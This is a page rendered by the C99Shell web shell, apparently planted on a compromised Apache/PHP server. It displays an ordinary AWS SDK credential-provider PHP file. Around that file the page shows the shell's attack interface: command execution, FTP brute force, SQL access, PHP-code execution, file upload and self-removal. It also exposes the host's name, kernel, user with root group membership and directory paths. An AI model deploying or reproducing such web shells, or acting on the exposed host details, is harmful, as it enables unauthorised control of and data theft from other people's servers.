!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Credentials/   drwxr-xr-x
Free 28.49 GB of 117.98 GB (24.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AssumeRoleCredentialProvider.php (1.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Credentials;

use 
Aws\Exception\CredentialsException;
use 
Aws\Result;
use 
Aws\Sts\StsClient;
use 
GuzzleHttp\Promise\PromiseInterface;

/**
 * Credential provider that provides credentials via assuming a role
 * More Information, see: http://docs.aws.amazon.com/aws-sdk-php/v3/api/api-sts-2011-06-15.html#assumerole
 */
class AssumeRoleCredentialProvider
{
    const 
ERROR_MSG "Missing required 'AssumeRoleCredentialProvider' configuration option: ";

    
/** @var StsClient */
    
private $client;

    
/** @var array */
    
private $assumeRoleParams;

    
/**
     * The constructor requires following configure parameters:
     *  - client: a StsClient
     *  - assume_role_params: Parameters used to make assumeRole call
     *
     * @param array $config Configuration options
     * @throws \InvalidArgumentException
     */
    
public function __construct(array $config = [])
    {
        if (!isset(
$config['assume_role_params'])) {
            throw new 
\InvalidArgumentException(self::ERROR_MSG "'assume_role_params'.");
        }

        if (!isset(
$config['client'])) {
            throw new 
\InvalidArgumentException(self::ERROR_MSG "'client'.");
        }

        
$this->client $config['client'];
        
$this->assumeRoleParams $config['assume_role_params'];
    }

    
/**
     * Loads assume role credentials.
     *
     * @return PromiseInterface
     */
    
public function __invoke()
    {
        
$client $this->client;
        return 
$client->assumeRoleAsync($this->assumeRoleParams)
            ->
then(function (Result $result) {
                return 
$this->client->createCredentials($result);
            })->
otherwise(function (\RuntimeException $exception) {
                throw new 
CredentialsException(
                    
"Error in retrieving assume role credentials.",
                    
0,
                    
$exception
                
);
            });
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--